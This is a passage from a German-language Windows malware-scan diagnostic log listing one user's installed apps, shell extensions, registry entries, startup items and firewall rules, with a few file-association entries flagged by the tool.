Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_42.0.23.0_neutral__8xx8rvfyw5nnt [2024-07-14] (Instagram)
iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa [2024-05-22] (Apple Inc.) [Startup Task]
Microsoft Family -> C:\Program Files\WindowsApps\MicrosoftCorporationII.MicrosoftFamily_0.2.40.0_x64__8wekyb3d8bbwe [2023-11-09] (Microsoft Corp.)
Microsoft Whiteboard -> C:\Program Files\WindowsApps\Microsoft.Whiteboard_53.21110.548.0_x64__8wekyb3d8bbwe [2024-03-07] (Microsoft Corporation)
Microsoft.BingSearch -> C:\Program Files\WindowsApps\Microsoft.BingSearch_1.0.91.0_x64__8wekyb3d8bbwe [2024-03-20] (Microsoft Corporation)
MicrosoftWindows.CrossDevice -> C:\Program Files\WindowsApps\MicrosoftWindows.CrossDevice_1.24062.51.0_x64__cw5n1h2txyewy [2024-07-19] (Microsoft Windows) [Startup Task]
Minecraft for Windows -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.21.202.0_x64__8wekyb3d8bbwe [2024-07-09] (Microsoft Studios)
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.7.2.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios)
Minecraft Legends - Windows -> C:\Program Files\WindowsApps\Microsoft.BadgerWin10_1.18.19068.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios)
Minecraft: Java Edition -> C:\Program Files\WindowsApps\Microsoft.MinecraftJavaEdition_1.0.5.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios)
MSI Center -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSICenter_2.0.38.0_x64__kzh8wxbdkxb8p [2024-06-29] (MICRO-STAR INTERNATIONAL CO., LTD) [Startup Task]
MSI Game Bar -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSIGameBar_2.0.15.0_x64__kzh8wxbdkxb8p [2024-02-07] (MICRO-STAR INTERNATIONAL CO., LTD)
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.99.5.0_x64__mcm4njqhnhss8 [2024-04-19] (Netflix, Inc.)
Norton Security -> C:\Program Files\Norton Security\Engine\22.24.2.6 [2024-07-22] (NortonLifeLock Inc.)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.966.0_x64__56jybvy8sckqj [2024-04-24] (NVIDIA Corp.)
PowerToys FileLocksmith Context Menu -> C:\Program Files\PowerToys\WinUI3Apps [2024-06-09] (Microsoft)
PowerToys ImageResizer Context Menu -> C:\Program Files\PowerToys [2024-06-09] (Microsoft)
PowerToys PowerRename Context Menu -> C:\Program Files\PowerToys\WinUI3Apps [2024-06-09] (Microsoft)
Python 3.11 -> C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.11_3.11.2544.0_x64__qbz5n2kfra8p0 [2024-04-03] (Python Software Foundation)
Quizlet -> C:\Program Files\WindowsApps\QuizletInc.Quizlet_1.0.1.0_neutral__1kmnvb67sms8a [2024-07-14] (Quizlet, Inc.)
Roblox -> C:\Program Files\WindowsApps\ROBLOXCORPORATION.ROBLOX_2.634.417.0_x64__55nm5eh3cm0pr [2024-07-19] (Roblox Corporation)
Speech Pack - German (Germany) -> C:\Program Files\WindowsApps\MicrosoftWindows.Speech.de-DE.1_1.0.5.0_x64__cw5n1h2txyewy [2024-06-23] (Microsoft Windows)
Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0 [2024-07-19] (Spotify AB) [Startup Task]
Supraland: Six Inches Under -> C:\Program Files\WindowsApps\HumbleBundle.SupralandSixInchesUnder_1.0.29.0_x64__q2mcdwmzx4qja [2024-06-15] (Humble Bundle)
WhatsApp -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2428.8.0_x64__cv1g1gvanyjgm [2024-07-20] (WhatsApp Inc.) [Startup Task]
WinAppRuntime.Main.1.5 -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Main.1.5_5001.178.1908.0_x64__8wekyb3d8bbwe [2024-07-10] (Microsoft Corp.)
WinAppRuntime.Singleton -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Singleton_5001.178.1908.0_x64__8wekyb3d8bbwe [2024-07-10] (Microsoft Corp.)
Windows Feature Experience Pack -> C:\Windows\SystemApps\MicrosoftWindows.Client.LKG_cw5n1h2txyewy [2024-07-12] (Microsoft Windows)
Windows-Fotoanzeige -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2024.11070.15005.0_x64__8wekyb3d8bbwe [2024-07-19] (Microsoft Corporation) [Startup Task]
WinRAR -> C:\Program Files\WinRAR [2023-09-13] (win.rar GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{10144713-1526-46C9-88DA-1FB52807A9FF}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.SvgThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{5ea9a442-5352-ed6e-d37f-9d511e7e2caa}\localserver32 -> C:\Program Files\PowerToys\PowerToys.PowerLauncher.exe (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{60789D87-9C3C-44AF-B18C-3DE2C2820ED3}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.MarkdownPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{729B72CD-B72E-4FE9-BCBF-E954B33FE699}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.QoiPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{77257004-6F25-4521-B602-50ECC6EC62A6}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.StlThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{A0257634-8812-4CE8-AF11-FA69ACAEAFAE}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.GcodePreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{AD856B15-D25E-4008-AFB7-AFAA55586188}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.QoiThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\skysc\AppData\Local\Autodesk\webdeploy\production\dabca83aceed67f5b8555a5b9697a3fc08792c77\NPreview10.dll (Autodesk, Inc. -> )
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{D8034CFA-F34B-41FE-AD45-62FCBB52A6DA}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.MonacoPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{F2847CBE-CD03-4C83-A359-1A8052C1B9D5}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.GcodeThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{FCDD4EED-41AA-492F-8A84-31A1546226E0}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.SvgPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers-x32: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ShellIconOverlayIdentifiers-x32: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [BUContextMenu] -> {F7CAA2A1-67A2-44BB-B20F-202FD8EB1DAB} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers1: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers2: [FileLocksmithExt] -> {84D68575-E186-46AD-B0CB-BAEB45EE29C0} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.FileLocksmithExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers2: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers3: [FileLocksmithExt] -> {84D68575-E186-46AD-B0CB-BAEB45EE29C0} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.FileLocksmithExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2024-06-04] (Malwarebytes Inc. -> Malwarebytes)
ContextMenuHandlers3: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.PowerRenameExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\nvshext.dll [2024-02-08] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers5: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.PowerRenameExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers6: [BUContextMenu] -> {F7CAA2A1-67A2-44BB-B20F-202FD8EB1DAB} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2024-06-04] (Malwarebytes Inc. -> Malwarebytes)
ContextMenuHandlers6: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
==================== Codecs (Nicht auf der Ausnahmeliste) ====================
==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
ShortcutWithArgument: C:\Users\skysc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\188f5ec9d11ded56\Persönlich 2 - Edge.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (Microsoft Corporation) -> --profile-directory="Profile 1"
==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
2024-07-22 16:12 - 2024-07-22 16:12 - 000111616 _____ () [Datei ist nicht signiert] \\?\C:\Users\skysc\AppData\Local\Temp\57e9083c-d5b9-477e-8644-249fa3ec6254.tmp.node
2024-07-22 16:12 - 2024-07-22 16:12 - 000270336 _____ () [Datei ist nicht signiert] \\?\C:\Users\skysc\AppData\Local\Temp\eb53eb96-7ca0-40e9-bfe6-bdf167c5a362.tmp.node
2024-07-22 15:43 - 2024-07-22 15:43 - 002877440 _____ () [Datei ist nicht signiert] C:\Users\skysc\AppData\Local\Programs\launcher\ffmpeg.dll
2024-07-22 15:43 - 2024-07-22 15:43 - 000478208 _____ () [Datei ist nicht signiert] C:\Users\skysc\AppData\Local\Programs\launcher\libegl.dll
2024-07-22 15:43 - 2024-07-22 15:43 - 007808512 _____ () [Datei ist nicht signiert] C:\Users\skysc\AppData\Local\Programs\launcher\libglesv2.dll
2024-07-22 15:43 - 2024-07-22 15:43 - 005238784 _____ () [Datei ist nicht signiert] C:\Users\skysc\AppData\Local\Programs\launcher\vk_swiftshader.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [3952]
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\regfile: <==== ACHTUNG
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.reg: => <==== ACHTUNG
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.bat: => <==== ACHTUNG
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.cmd: => <==== ACHTUNG
==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://localoem.msn.com/?pc=SBJB
SearchScopes: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001 -> DefaultScope {748F61FA-2044-4035-AAD3-7322004BAF23} URL =
SearchScopes: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001 -> {748F61FA-2044-4035-AAD3-7322004BAF23} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM-x32 - Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Keine Datei
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
IE trusted site: HKU\.DEFAULT\...\adaware.com -> hxxp://adaware.com
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\localhost -> localhost
==================== Hosts Inhalt: =========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2022-05-07 07:24 - 2024-07-20 14:39 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts
==================== Andere Bereiche ===========================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\skysc\AppData\Local\Microsoft\Windows\Themes\green\DesktopBackground\design ohne titel.jpg
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
ist aktiviert.
Network Binding:
=============
Ethernet: Realtek PCIe GbE Family Controller -> rt68cx21x64.sys
netvsc_vfpp: Microsoft NetVsc Failover VF Protocol
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
HKLM\...\StartupApproved\Run: => "RtkAudUService"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\StartupFolder: => "SearchEngineOptimizer.lnk"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_E457065EC9FFC031D52374F8B9832F00"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Opera GX Stable"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Opera GX Browser Assistant"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "SUPERAntiSpyware"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{79DB3BD0-3A79-4448-9EB3-730B8B161F78}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{778F0263-8CF1-47F6-B82F-9B196556BB03}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{A1375D8B-211F-46FD-BF4A-ACF3BC888C71}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{9DA7C74D-C4E5-4E61-9B05-C677F08101AE}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{CCF3D3EA-C12E-4397-A81B-A8D8F1B52E5E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{9F9F357C-17F5-47D7-A92D-535EEA36F817}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{5421962D-D93D-4A38-B8E0-AF3D5B012B70}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{31F431BD-FA45-4EB5-857D-B92DDDD55C7E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PortalRTX\hl2.exe () [Datei ist nicht signiert]
FirewallRules: [{4F47432D-BFE5-4B0D-BC3D-50AC5D2155E1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PortalRTX\hl2.exe () [Datei ist nicht signiert]
FirewallRules: [{849421B3-DBB9-42F3-AC3F-559BF23BF169}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\3DMark\bin\x64\3DMark.exe (Underwriters Laboratories Inc. -> )
FirewallRules: [{AC2A4BA7-A657-4AE3-8168-FF06531440F5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\3DMark\bin\x64\3DMark.exe (Underwriters Laboratories Inc. -> )
FirewallRules: [TCP Query User{433BCD88-C4B2-4EF5-A15C-DE87B1EFEC9D}C:\users\skysc\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\skysc\appdata\local\programs\opera gx\opera.exe (Opera Norway AS -> Opera Software)
FirewallRules: [UDP Query User{A64C0A77-F5DE-437F-9A08-F4D6C7CE1526}C:\users\skysc\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\skysc\appdata\local\programs\opera gx\opera.exe (Opera Norway AS -> Opera Software)
FirewallRules: [{6C1DFBDC-CBC2-4532-BA81-61428BAD9E32}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9D0B8760-8B4F-48C0-B584-1EDE76067744}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{54B682FF-D75A-43BC-8621-35B131EEC47D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{37DE760A-966C-4CEF-A94E-943B067E2C38}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{DB802AC9-3200-4942-8A66-9E21653D6877}] => (Allow) C:\Users\skysc\Downloads\reiboot.exe => Keine Datei
FirewallRules: [{673CA5C5-087F-4D3C-A551-7B55882DD6C4}] => (Allow) C:\Users\skysc\Downloads\reiboot.exe => Keine Datei
FirewallRules: [{9A64A019-644F-406D-A589-4309A5CB1597}] => (Allow) C:\program files (x86)\wondershare\wondershare dr.fone basic - deutsch\drfonetoolkit.exe => Keine Datei
FirewallRules: [{BCB306CA-E1A4-40C1-8EB4-81578EF309AD}] => (Allow) C:\Users\skysc\Downloads\iphone-unlock.exe => Keine Datei
FirewallRules: [{85C84592-4891-403F-9F3A-956B0298089D}] => (Allow) C:\Users\skysc\Downloads\iphone-unlock.exe => Keine Datei
FirewallRules: [{ED6838B8-72BA-41FE-BF1C-D1A5390DEEBA}] => (Allow) C:\Users\skysc\Downloads\4ukey.exe => Keine Datei
FirewallRules: [{728CC1FC-9D1C-4247-8088-91A054283042}] => (Allow) C:\Users\skysc\Downloads\4ukey.exe => Keine Datei
FirewallRules: [{E1E74D51-2416-4DA4-BD94-D5FBBA9F7BF2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [Datei ist nicht signiert]
FirewallRules: [{169827A1-12F0-4DE6-80EE-9EEFF1942860}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [Datei ist nicht signiert]
